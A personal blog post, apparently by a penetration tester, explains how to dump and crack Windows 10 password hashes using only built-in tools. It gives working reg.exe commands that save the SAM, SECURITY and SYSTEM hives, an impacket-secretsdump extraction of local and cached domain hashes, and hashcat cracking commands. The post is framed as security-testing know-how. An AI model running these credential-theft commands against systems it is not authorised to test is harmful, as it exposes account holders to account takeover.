Hi!

I wanted to dump hashes on a Windows 10 box without any external tools. This is how I did it with internal Windows tools if you do not have access to mimikatz / hashdump / metasploit. As a bonus we also look at cached domain hashes.

We start at first with the short version

  1. Export SAM with reg.exe
  2. Convert SAM with impacket-secretsdump to get to the hashes
  3. Use hashcat to crack the hashes

We start first with exporting the sam database with reg.exe

reg.exe save hklm\sam c:\tmp\sam.save
reg.exe save hklm\security c:\tmp\security.save
reg.exe save hklm\system c:\tmp\system.save

It is time to get the hashes out from these files.

Transfer the files to machine that have impacket installed. We need to extract the hashes from these 3 files. I use impacket-secretdump and the output is roger.hash

impacket-secretsdump -sam ./sam.save -security ./security.save -system ./system.save LOCAL > roger.hash

Now we have a file roger.hash that have local accounts and cached domain haches.

Use hashcat to crack the hashes

For local accounts we copy the hashes into a file local.hash.

For cached accounts we do the same. As you can see we remove the domain and stuff so that the line begins with C2$

Now it is time to crack the hashes. For local accounts we use -m 1000 for cached accounts we use -m 2100

Cached account with password file

hashcat -m 2100 ./cached.hash /usr/share/wordlists/rockyou.txt

Cached account with brute force without any mask (guess.mask)

hashcat -m 2100 -a 3 ./cached.hash 

The same for local except mode is -m 1000

I hope this help someone out there!

Keep hacking!

//Roger

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s